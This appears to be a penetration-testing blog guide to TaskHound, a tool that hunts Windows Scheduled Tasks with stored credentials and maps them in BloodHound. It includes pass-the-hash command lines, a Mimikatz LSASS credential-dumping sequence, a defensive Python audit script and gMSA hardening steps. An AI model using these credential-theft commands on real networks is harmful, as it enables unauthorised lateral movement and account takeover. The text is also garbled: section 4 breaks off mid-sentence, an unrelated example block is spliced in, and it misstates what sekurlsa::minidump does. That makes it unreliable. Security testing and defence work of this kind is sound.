
Introduction:
In the critical aftermath of a successful initial breach, attackers and ethical pentesters alike engage in a relentless hunt for stored credentials to escalate privileges and move laterally. A primary target in Windows environments has always been Scheduled Tasks configured with privileged user contexts, but manually enumerating and analyzing these tasks has been a notoriously tedious and error-prone process. This guide delves into the revolutionary open-source tool, TaskHound, which automates this hunt over SMB, parses task XML, and integrates with BloodHound to visually map attack paths, fundamentally changing the post-exploitation landscape.
Learning Objectives:
- Understand the critical attack vector of Scheduled Tasks with stored credentials and how to exploit them.
- Master the installation, configuration, and execution of TaskHound for comprehensive network enumeration.
- Learn to interpret TaskHound’s output and integrate its findings into BloodHound for advanced attack path analysis.
You Should Know:
1. The Anatomy of a Windows Scheduled Task Credential Attack
Scheduled Tasks can be configured to run with the stored credentials of a privileged user. If an attacker compromises a machine, these credentials can be extracted from memory or disk, allowing for lateral movement and privilege escalation. The core of the attack lies in identifying every single task across the network that possesses these stored credentials.
Verified Windows Command:
```powershell
# Manually query scheduled tasks on a local system (PowerShell)
# Filter on the principal's UserId; the wildcard matches any account name containing "Admin"
Get-ScheduledTask |
    Where-Object { $_.Principal.UserId -like "*Admin*" } |
    Format-Table TaskPath, TaskName, State,
        @{Name="User"; Expression={ $_.Principal.UserId }},
        @{Name="LogonType"; Expression={ $_.Principal.LogonType }}

# Use schtasks.exe for basic remote enumeration
schtasks /query /s <TARGET_HOST> /fo LIST /v
```
Step-by-step guide:
The `Get-ScheduledTask` PowerShell cmdlet is the native way to interact with the Task Scheduler. The first command filters for tasks where the executing user (Principal.UserId) contains “Admin”. The older `schtasks.exe` utility can perform basic remote enumeration (/s <TARGET_HOST>). However, these methods are slow, do not systematically parse the underlying XML for credentials, and are cumbersome to run across an entire domain, highlighting the need for an automated tool like TaskHound.
2. Installing and Configuring TaskHound for Your Engagement
TaskHound is a Go-based tool, making it easy to deploy on any system used for a penetration test. Its primary requirement is valid domain credentials with read access to the SMB shares on target systems to retrieve the task definitions.
Verified Linux Command (Compiling from Source):
```bash
# Clone the TaskHound repository from ProSec's GitHub
git clone https://github.com/ProSec/TaskHound.git
cd TaskHound

# Install dependencies and build the binary
go mod tidy
go build -o taskhound main.go

# Verify the build
./taskhound -h
```
Step-by-step guide:
After cloning the repository, use the `go mod tidy` command to fetch all necessary dependencies. The `go build` command compiles the source code into an executable binary named taskhound. Running the tool with the `-h` flag confirms a successful build and displays the help menu, showing all available command-line options like target specification and output formats.
3. Executing a Network-Wide Scheduled Task Hunt
The power of TaskHound is in its ability to efficiently scan multiple targets. You provide it a list of hosts, and it automates the SMB connection and XML parsing process.
Verified Linux Command (Basic TaskHound Execution):
```bash
# Run TaskHound against a list of targets from a file
./taskhound -t targets.txt -d YOURDOMAIN.COM -u username -p 'Password123!' -o taskhound_results.json

# Using pass-the-hash for authentication
./taskhound -t targets.txt -d YOURDOMAIN.COM -u username -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -o taskhound_results.json
```
Step-by-step guide:
The `-t` flag specifies a file containing a list of target IP addresses or hostnames. The `-d`, `-u`, and `-p` flags provide the domain, username, and password for authentication. Crucially, TaskHound supports pass-the-hash (`-H`) with an NTLM hash, which is invaluable during a penetration test where you may not have the plaintext password. The `-o` flag writes the results to a JSON file for later analysis.
4. Decoding the XML: Finding Stored Credentials
Each Scheduled Task’s configuration is stored as an XML file. The critical element for attackers is the `
Verified Windows Command (Manual XML Inspection):
```batch
:: Export a specific task to XML for manual analysis
schtasks /query /tn "\Microsoft\Windows\ExampleTask" /xml > C:\temp\task.xml
```
Then, inspect the `<UserId>` and `<LogonType>` fields within the XML.
Step-by-step guide:
This manual method uses `schtasks /query /tn
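To make the checks from the anatomy section and from this section concrete, here is an added example (not TaskHound's code and not part of the original guide) that classifies exported task definitions by how their run-as credential is held. It reads the XML that `schtasks /query /tn <name> /xml` produces (decode the file with `encoding="utf-16"` before passing it in) and, for detection at creation time rather than on a periodic sweep, the same logic is applied to the `TaskContent` field of Security event 4698 ("A scheduled task was created"). The task names, account names, commands and the 4698 event are constructed sample data; the risk labels are this example's own scheme.

```python
"""Audit Windows Scheduled Task definitions for stored credentials.

Added example, not TaskHound's code. Input is the task XML that
`schtasks /query /tn <name> /xml` exports, or the TaskContent field of
Security event 4698. All sample data below is constructed.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Built-in identities: a task running as one of these holds no domain
# credential in the Credential Manager vault, so it is not lateral-movement
# material even though it may run as SYSTEM.
BUILTIN = {"S-1-5-18", "S-1-5-19", "S-1-5-20", "SYSTEM",
           "LOCAL SERVICE", "NETWORK SERVICE", "NT AUTHORITY\\SYSTEM"}


def _text(parent, path, ns):
    node = parent.find(path, ns) if parent is not None else None
    return (node.text or "").strip() if node is not None else ""


def assess_task(task_xml: str, name: str = "") -> dict:
    """Classify one task definition by how its run-as credential is held."""
    # Exports carry a UTF-16 declaration; once decoded to str it is noise.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml))
    if root.tag != "{%s}Task" % TASK_NS["t"]:
        raise ValueError("not a Task Scheduler XML document")
    principal = root.find("t:Principals/t:Principal", TASK_NS)
    user = _text(principal, "t:UserId", TASK_NS)
    logon = _text(principal, "t:LogonType", TASK_NS)
    run_level = _text(principal, "t:RunLevel", TASK_NS)
    commands = [_text(e, "t:Command", TASK_NS)
                for e in root.findall("t:Actions/t:Exec", TASK_NS)]

    if user.upper() in BUILTIN or logon == "ServiceAccount":
        risk, why = "INFO", "built-in service identity, no stored domain credential"
    elif logon in ("Password", "InteractiveTokenOrPassword") and user.endswith("$"):
        risk, why = "LOW", "gMSA/computer account: AD manages the password, nothing reusable is stored"
    elif logon in ("Password", "InteractiveTokenOrPassword"):
        risk, why = "HIGH", "password for %s is stored on this host; host compromise exposes it" % user
    elif logon == "S4U":
        risk, why = "LOW", "S4U logon: runs as the user with no stored password"
    else:
        risk, why = "LOW", "runs only in the interactive token of a logged-on user"
    if risk == "HIGH" and run_level == "HighestAvailable":
        why += "; task also requests elevation (RunLevel=HighestAvailable)"
    return {"task": name, "user": user, "logon_type": logon, "run_level": run_level,
            "commands": commands, "risk": risk, "reason": why}


def task_from_event_4698(event_xml: str) -> dict:
    """Assess the task definition embedded in a Security 4698 event."""
    ev = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", EVENT_NS)}
    finding = assess_task(data["TaskContent"], data.get("TaskName", ""))
    finding["created_by"] = data.get("SubjectUserName", "")
    return finding


def audit(tasks: dict) -> list:
    """Assess a {task name: xml} mapping and return findings, worst first."""
    order = {"HIGH": 0, "LOW": 1, "INFO": 2}
    return sorted((assess_task(x, n) for n, x in tasks.items()), key=lambda f: order[f["risk"]])


SAMPLE_TASKS = {  # constructed exports, one per credential-holding style
    r"\Backup\NightlyBackup": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>CORP\svc_backup</UserId>
    <LogonType>Password</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Scripts\backup.exe</Command></Exec></Actions>
</Task>""",
    r"\WebApp\LogRotate": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>CORP\webapp-gmsa$</UserId>
    <LogonType>Password</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Scripts\rotate.ps1</Command></Exec></Actions>
</Task>""",
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId>
    <LogonType>ServiceAccount</LogonType></Principal></Principals>
</Task>""",
}

SAMPLE_EVENT_4698 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID></System>
  <EventData><Data Name="SubjectUserName">jdoe</Data><Data Name="TaskName">\Maint\Cleanup</Data>
    <Data Name="TaskContent">&lt;?xml version="1.0" encoding="UTF-16"?&gt;&lt;Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;&lt;Principals&gt;&lt;Principal&gt;&lt;UserId&gt;CORP\da_admin&lt;/UserId&gt;&lt;LogonType&gt;Password&lt;/LogonType&gt;&lt;/Principal&gt;&lt;/Principals&gt;&lt;/Task&gt;</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    for f in audit(SAMPLE_TASKS) + [task_from_event_4698(SAMPLE_EVENT_4698)]:
        print("%-4s %-45s %-22s %s" % (f["risk"], f["task"], f["user"], f["reason"]))
```

The split between `Password` with a plain user and `Password` with a `$`-suffixed account is the whole point of the gMSA mitigation later in this guide: both show the same `LogonType`, but only the former leaves a reusable secret behind on the host. Treating `S4U` and `InteractiveToken` as low risk reflects that neither stores a password, not that the task itself is harmless.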
5. From Data to Domination: Feeding TaskHound into BloodHound
TaskHound’s most powerful feature is its ability to output data in a format compatible with BloodHound’s “Custom Attack Path” feature. This visualizes how a compromised account with access to a task-hosting machine can lead to the compromise of high-privilege accounts.
Verified Linux Command (BloodHound Import):
```bash
# After running TaskHound, use the generated JSON with BloodHound
# 1. Start Neo4j and the BloodHound UI
neo4j console &
bloodhound --no-sandbox
```
2. In BloodHound, go to "Upload Data" and select the `taskhound_results.json` file.
Step-by-step guide:
First, ensure the Neo4j database (which backs BloodHound) is running with `neo4j console`. Then, launch the BloodHound UI. Navigate to the "Upload Data" tab and drag-and-drop or select the `taskhound_results.json` file generated by TaskHound. BloodHound will process this data, and the new attack paths will appear in your graph, showing clear relationships from your initial foothold to the privileged accounts found by TaskHound.
6. Exploiting the Findings: Dumping Credentials from Memory
Once TaskHound identifies a machine running a task with privileged stored credentials, the next step is to compromise that host and extract the credentials. A common method is dumping the LSASS process memory.
Verified Windows Command (Mimikatz for LSASS Dump):
```
# Dump LSASS memory to a file for offline processing (requires Admin privileges)
privilege::debug
sekurlsa::minidump C:\temp\lsass.dmp
sekurlsa::logonPasswords full
```
Step-by-step guide:
This classic Mimikatz sequence first enables the `SeDebugPrivilege` (privilege::debug), which is required to access another process’s memory. The `sekurlsa::minidump` command creates a dump file of the LSASS process. Finally, `sekurlsa::logonPasswords` parses this dump file to extract plaintext passwords, Kerberos tickets, and NTLM hashes of logged-on users, including the account running the scheduled task.
7. Mitigation and Hardening: Securing Your Scheduled Tasks
The defensive counterpart is to eliminate the dangerous configurations that TaskHound exploits. This involves using more secure service accounts like Group Managed Service Accounts (gMSAs) and applying the principle of least privilege.
Verified Windows Command (PowerShell for gMSA):
```powershell
# Install the AD PowerShell module and create a new gMSA
# (the domain must already have a KDS root key; creation fails otherwise)
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
New-ADServiceAccount -Name "MyWebApp-gMSA" `
    -DNSHostName "MyWebApp-gMSA.mydomain.com" `
    -PrincipalsAllowedToRetrieveManagedPassword 'WEB_SERVERS$'

# Test that a member server can retrieve the gMSA password
# (run on the member server, after Install-ADServiceAccount has been run there)
Test-ADServiceAccount MyWebApp-gMSA
```
Step-by-step guide:
gMSAs manage their own passwords automatically; the password is held by the LSA on the authorized hosts and never appears in the task XML. This command sequence, run from a Domain Controller, creates a new gMSA (`New-ADServiceAccount`) and specifies which computer accounts (`-PrincipalsAllowedToRetrieveManagedPassword`) are allowed to retrieve its password. The `Test-ADServiceAccount` cmdlet verifies the configuration from a member server.
What Undercode Say:
- Automation is Non-Negotiable: Manual post-exploitation enumeration is dead. Tools like TaskHound that automate the discovery of complex, distributed attack vectors represent the new baseline for both red and blue teams.
- Context is King: Finding a credential is one thing; understanding its place in the kill chain is another. The direct integration with BloodHound is a game-changer, transforming raw data into an actionable strategic map.
The release of TaskHound signifies a maturation in the offensive security toolscape. It’s not just another vulnerability scanner; it’s a force multiplier that addresses a specific, painful, and high-impact phase of penetration testing. By systematically uncovering and visualizing this specific misconfiguration, it pushes defenders to adopt more secure practices like gMSAs and forces a re-evaluation of legacy automation scripts. This tool closes the gap between knowing a theoretical weakness and being able to rapidly and reliably exploit it at scale.
Prediction:
The automated, graph-based attack path discovery pioneered by tools like BloodHound and now extended by TaskHound will become the standard for all post-exploitation frameworks. We predict that within two years, EDR and SIEM systems will begin integrating similar "assumed-clear" pathing analytics proactively, allowing blue teams to simulate an attacker's view of their network and harden against these exact techniques before a breach occurs. The cat-and-mouse game will escalate to the graph database layer, with attackers using tools like TaskHound to find paths and defenders using graph analysis to sever them preemptively.
Reported By: Prosec Networks – Hackers Feeds